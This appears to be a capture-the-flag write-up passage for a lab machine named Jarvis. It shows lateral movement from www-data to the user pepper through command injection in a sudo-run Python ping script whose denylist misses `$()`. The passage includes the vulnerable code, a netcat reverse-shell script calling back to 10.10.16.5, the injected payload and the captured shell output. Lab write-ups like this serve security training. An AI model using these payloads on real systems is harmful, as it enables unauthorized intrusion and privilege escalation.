7 www-data > pepper

www-data@jarvis: sudo -u pepper /var/www/Admin-Utilities/simpler.py

# there is a ping function that is executed when the -p flag is used
simpler.py
# Excerpt of the ping routine in simpler.py; the enclosing function header is not shown here.
# Denylist of substrings that abort the run; note that `$`, `(` and `)` are not on it.
forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    # Substring check only: any input free of the listed tokens is accepted as-is.
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    # The unvalidated input is concatenated into a shell command line and run via os.system.
    os.system('ping ' + command)
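# tried using a custom ping; but then realized python PATH is different from system PATH
# as there's a forbidden list, this definitely looks like command injection: the list omits `$`, `(` and `)`, so `$(...)` command substitution still reaches the shell through os.system
# (robust fix: validate the input as an IP address, e.g. with ipaddress.ip_address, and run ping via subprocess.run with an argument list instead of a shell string)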

Using https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.5 443' > /tmp/kashz.sh

www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(/tmp/kashz.sh)
# the shell expands $(...) before ping runs, so /tmp/kashz.sh is executed as pepper.

$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.143] 51808
whoami;id;hostname
pepper
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
jarvis
